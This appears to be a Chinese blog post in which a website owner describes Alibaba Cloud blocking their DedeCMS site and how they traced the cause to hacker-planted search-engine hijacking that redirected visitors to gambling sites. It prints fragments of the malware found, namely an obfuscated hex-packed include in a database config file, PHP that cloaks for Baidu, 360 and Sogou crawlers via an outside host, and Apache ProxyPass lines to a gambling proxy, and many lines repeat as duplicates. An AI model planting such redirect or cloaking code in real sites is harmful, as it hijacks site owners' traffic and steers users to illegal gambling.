2018年1月8號一大早收到阿里雲的郵件以及短信提醒大體內容是說:違規URL屏蔽訪問通
知,立即登錄阿里雲官方,進賬戶面板查看信息,發現阿里雲消息有很多條未讀的,都是關於網
站被屏蔽訪問的通知。點擊查看詳情如下圖:
您的CDN網站URL:http://www.******.net/k/cilrq/90070.htm涉及違法不良信息,違反了相關
服務協議和《互聯網信息服務管理辦法》第十五條規定,目前阿里雲已對您的違法URL做屏
蔽訪問處理。如果您對本通知的內容存有疑問,請及時工單或者電話聯繫我們,謝謝您對阿
裡雲的支持。
服務協議和《互聯網信息服務管理辦法》第十五條規定,目前阿里雲已對您的違法URL做屏
蔽訪問處理。如果您對本通知的內容存有疑問,請及時工單或者電話聯繫我們,謝謝您對阿
裡雲的支持。
重點關注自2017年1月10日起,阿里雲業務安全團隊將執行監管政策針對網民舉報或者監管下發7
天累計超過100個違法頁面的網站進行升級處罰。
天累計超過100個違法頁面的網站進行升級處罰。
處罰標準如下:
第一次(7天累計違規網頁達100條) 阻斷域名 完全整改、公安平台提交備案、參加網站安全管
理考試及培訓
理考試及培訓
第二次 (7天累計違規網頁達100條) 阻斷域名且1年內禁止參加阿里雲平台營銷活動。 完全整
改、公安平台成功備案、參加網站安全管理考試及培訓。
改、公安平台成功備案、參加網站安全管理考試及培訓。
第三次 (7天累計違規網頁達100條)阻斷域名,賬號禁止購買且永不開通。
還有一個阿里雲的屏蔽通知是URL禁止訪問 您存在國家法律法規規定嚴禁買賣或傳播的商品,如
下圖所示:說是我網站存在一些非法的信息,國家不允許的。
網站被阿里雲違規URL屏蔽訪問處理通知,那麼該如何解決這個問題?首先我第一想到的就是網站
有可能被駭客篡改了,看了下自己的網站在百度的收錄情況,發現了問題,百度收錄了許多與我們
網站不相關內容的信息,什麼博彩,以及娛樂城等的網頁快照,從百度點擊進去直接跳轉到博彩網
站上去,360直接攔截並提示為:未經證實的博彩賭博網站,您訪問的網站含有未證實的境外博彩
或非法賭博的相關內容,可能給您造成財產上的損失,請您謹慎訪問。
有可能被駭客篡改了,看了下自己的網站在百度的收錄情況,發現了問題,百度收錄了許多與我們
網站不相關內容的信息,什麼博彩,以及娛樂城等的網頁快照,從百度點擊進去直接跳轉到博彩網
站上去,360直接攔截並提示為:未經證實的博彩賭博網站,您訪問的網站含有未證實的境外博彩
或非法賭博的相關內容,可能給您造成財產上的損失,請您謹慎訪問。
很無語,網站都運行一年多了,都沒有被駭客攻擊過,這次是徹底的碰到了,既然問題發生了,那
就勇敢的面對去解決問題,我的判斷是網站程序代碼裡被植入了惡意木馬病毒代碼,於是連接FTP
把網站程序都下載到自己的電腦上,一行一行代碼的進行查看,看的眼都花了,在數據庫配置文件
裡發現了問題。有一段加密的代碼在裡面:
就勇敢的面對去解決問題,我的判斷是網站程序代碼裡被植入了惡意木馬病毒代碼,於是連接FTP
把網站程序都下載到自己的電腦上,一行一行代碼的進行查看,看的眼都花了,在數據庫配置文件
裡發現了問題。有一段加密的代碼在裡面:
@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F5570
6C6F616432F506963747572652F323031362D31312D31312F30'));
function parse_name($name, $type=0)
?php
set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http://seo.seoso8.com/');
define('s_s','@haosou.com|360.cn|360spider|
so|360|sogou|baidu|youdao@i');
define('h_t',$_SERVER['SERVER_NAME']);define
('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP
_USER_AGENT']);define('h_z',s_p());
從上面代碼可以看出,這個一個劫持百度快照的代碼,劫持360,以及百度,搜狗等搜索引擎的一
個木馬代碼。刪除掉以上代碼,然後從百度點擊進去,網站沒有再跳轉,看來問題的根本在這裡。
本以為徹底的解決了問題,再從百度點擊其他頁面,又出現了跳轉,欲哭無淚,這個駭客好高級,
幹嘛要這麼整我的網站啊。(後來咨詢了很多安全行業的大牛,才知道,駭客利用我網站在百度
上的權重,進行百度快照劫持,導致我網站收錄一些博彩的快照,以利於駭客的博彩關鍵詞在百
度的排名)
個木馬代碼。刪除掉以上代碼,然後從百度點擊進去,網站沒有再跳轉,看來問題的根本在這裡。
本以為徹底的解決了問題,再從百度點擊其他頁面,又出現了跳轉,欲哭無淚,這個駭客好高級,
幹嘛要這麼整我的網站啊。(後來咨詢了很多安全行業的大牛,才知道,駭客利用我網站在百度
上的權重,進行百度快照劫持,導致我網站收錄一些博彩的快照,以利於駭客的博彩關鍵詞在百
度的排名)
對主機的環境我也進行了詳細的檢查與審計,發現apache的配置文件http.conf 也被篡改了,代
碼如下:
碼如下:
Proxypass /k(.) http://123.z7y.cc/
ProxypassMatch /k(.) http://123.z7y.cc/
打開上面的網址,直接跳轉到了博彩網站上去了,去掉上面的代碼網站恢復了正常。立即提交阿里
雲的工單,告訴阿里雲的技術,已經解決了網站違規的內容,請盡快解除網站的屏蔽,讓網站恢復
正常訪問。 不到2小時,阿里雲技術回復了,已經解除對網站的屏蔽訪問,至此網站違規URL屏蔽
訪問處理通知,已得到徹底的解決。那麼網站為何被篡改? 大部分是由於網站存在漏洞,我用的
是dedecms織夢系統,系統以前一直沒升級更新過,導致以前的版本存在漏洞,網站才被駭客攻
擊。現在網站已經升級到最新版本,沒有再出現被篡改的情況。希望以上我的處理過程以及辦法,
能幫到更多和我一樣遇到這個情況的人。
雲的工單,告訴阿里雲的技術,已經解決了網站違規的內容,請盡快解除網站的屏蔽,讓網站恢復
正常訪問。 不到2小時,阿里雲技術回復了,已經解除對網站的屏蔽訪問,至此網站違規URL屏蔽
訪問處理通知,已得到徹底的解決。那麼網站為何被篡改? 大部分是由於網站存在漏洞,我用的
是dedecms織夢系統,系統以前一直沒升級更新過,導致以前的版本存在漏洞,網站才被駭客攻
擊。現在網站已經升級到最新版本,沒有再出現被篡改的情況。希望以上我的處理過程以及辦法,
能幫到更多和我一樣遇到這個情況的人。
(很多哥們也遇到了這個問題,加了我好友,並且描述了他們遇到的情況,有些是比較複雜的,
如果自己對網站代碼不是太懂的話,建議找專業的網站安全公司來處理,國內像eSafe白帽資安網公司、
綠盟安全公司、都是比較不錯的,阿里雲那面我也咨詢了相關的解決方案,阿里雲也是建議找
第三方安全公司處理。)
如果自己對網站代碼不是太懂的話,建議找專業的網站安全公司來處理,國內像eSafe白帽資安網公司、
綠盟安全公司、都是比較不錯的,阿里雲那面我也咨詢了相關的解決方案,阿里雲也是建議找
第三方安全公司處理。)
